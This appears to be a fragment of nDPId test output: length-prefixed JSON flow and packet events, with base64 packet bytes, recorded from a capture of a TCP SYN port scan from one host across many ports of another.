-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fwAADcGK3asEAAIQA2GNIzTA\/LdU4MZAAAAAGACEAAkmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7YAADgGAL2sEAAIQA2GNIzTH5ndU4MZAAAAAGACBAAU8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs2pkAADYGN9msEAAIQA2GNIzTDmrdU4MZAAAAAGACDAAeIgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsxEMAADMGUS+sEAAIQA2GNIzTA4bdU4MZAAAAAGACEAAlBgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAssU4AACUGciSsEAAIQA2GNIzSB7PdUoMYAAAAAGACCAAo3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC18AACUGGBSsEAAIQA2GNIzSFGbdUoMYAAAAAGACCAAcKQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dwAAC4GOJasEAAIQA2GNIzSBEzdUoMYAAAAAGACDAAoQwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC\/AAACUGF4OsEAAIQA2GNIzSGgzdUoMYAAAAAGACCAAWgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsuskAACwGYamsEAAIQA2GNIzSIZjdUoMYAAAAAGACBAAS9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsXBEAACwGwGGsEAAIQA2GNIzSE4jdUoMYAAAAAGACBAAhBwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs5JMAADoGKd+sEAAIQA2GNIzSAsrdUoMYAAAAAGACDAApxQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAshEYAADgGjCysEAAIQA2GNIzSHvHdUoMYAAAAAGACBAAVngAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAspVMAADMGcB+sEAAIQA2GNIzSF+DdUoMYAAAAAGACEAAQrwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAskd4AACkGjZSsEAAIQA2GNIzSxHzdUoMYAAAAAGACCABsEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+wAAC4G4oasEAAIQA2GNIzSGAzdUoMYAAAAAGACDAAUgwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ2YAADQG7QysEAAIQA2GNIzSNdfdUoMYAAAAAGACBAD+twAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAs1wMAADAGQW+sEAAIQA2GNIzSH0fdUoMYAAAAAGACBAAVSAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsnrUAADMGdr2sEAAIQA2GNIzSgAXdUoMYAAAAAGACEACoiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsmXkAADsGc\/msEAAIQA2GNIzSBFHdUoMYAAAAAGACEAAkPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsX+sAAC8GuYesEAAIQA2GNIzSE7rdUoMYAAAAAGACEAAU1QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsrscAADQGZausEAAIQA2GNIzSBJfdUoMYAAAAAGACBAAv+AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAspigAADAGckqsEAAIQA2GNIzSDLzdUoMYAAAAAGACBAAn0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsFq0AADAGAcasEAAIQA2GNIzSIyndUoMYAAAAAGACBAARZgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsr38AACUGc\/OsEAAIQA2GNIzSOpvdUoMYAAAAAGACCAD18wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 